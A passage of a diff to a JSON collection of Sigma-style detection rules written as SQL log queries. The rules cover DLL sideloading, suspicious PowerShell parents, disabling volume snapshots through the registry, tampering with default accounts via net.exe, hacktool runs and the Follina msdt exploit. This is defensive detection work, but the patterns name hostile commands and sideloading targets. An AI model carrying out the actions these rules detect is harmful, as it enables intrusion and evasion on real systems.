ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", 
"status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Other scripts" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Legitimate administration" + "Legitimate macro usage. 
Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - SharpLDAPmonitor Execution", - "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "status": "experimental", - "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Potential Dosfuscation Activity", - "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "title": "Python Py2Exe Image Load", + "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "status": "experimental", - "description": "Detects possible payload obfuscation via the commandline", - "author": 
